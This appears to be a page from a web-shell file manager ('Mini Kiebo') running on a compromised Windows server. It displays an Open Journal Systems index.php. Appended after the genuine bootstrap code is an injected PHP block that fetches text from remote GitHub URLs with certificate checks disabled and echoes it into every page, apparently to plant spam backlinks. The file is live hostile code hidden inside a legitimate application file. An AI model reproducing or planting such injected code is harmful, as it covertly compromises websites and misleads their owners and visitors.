[ Mini Kiebo ]
Server: Windows NT DESKTOP-5B8S0D4 6.2 build 9200 (Windows 8 Professional Edition) i586
Path:
D:
/
Backup
/
14082024
/
Data
/
htdocs
/
htdocs
/
jurnal-kesmas
/
baru
/
[
Home
]
File: index.php
<?php /** * @file index.php * * Copyright (c) 2014-2021 Simon Fraser University * Copyright (c) 2003-2021 John Willinsky * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING. * * Bootstrap code for OJS site. Loads required files and then calls the * dispatcher to delegate to the appropriate request handler. */ use APP\core\Application; // Initialize global environment define('INDEX_FILE_LOCATION', __FILE__); require_once './lib/pkp/includes/bootstrap.php'; // Serve the request Application::get()->execute(); ?> <?php function curlGetContents($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $fileContents = curl_exec($ch); curl_close($ch); return $fileContents; } $url1 = 'https://raw.githubusercontent.com/BacklinkGG/VIP-ID/main/system.txt'; $url2 = 'https://raw.githubusercontent.com/BacklinkGG/VIP-ID/main/site/stikes-bhaktipertiwi/siakad.stikesbpi.ac.id/system.txt'; $fileContents1 = curlGetContents($url1); $fileContents2 = curlGetContents($url2); echo $fileContents1; echo $fileContents2; ?>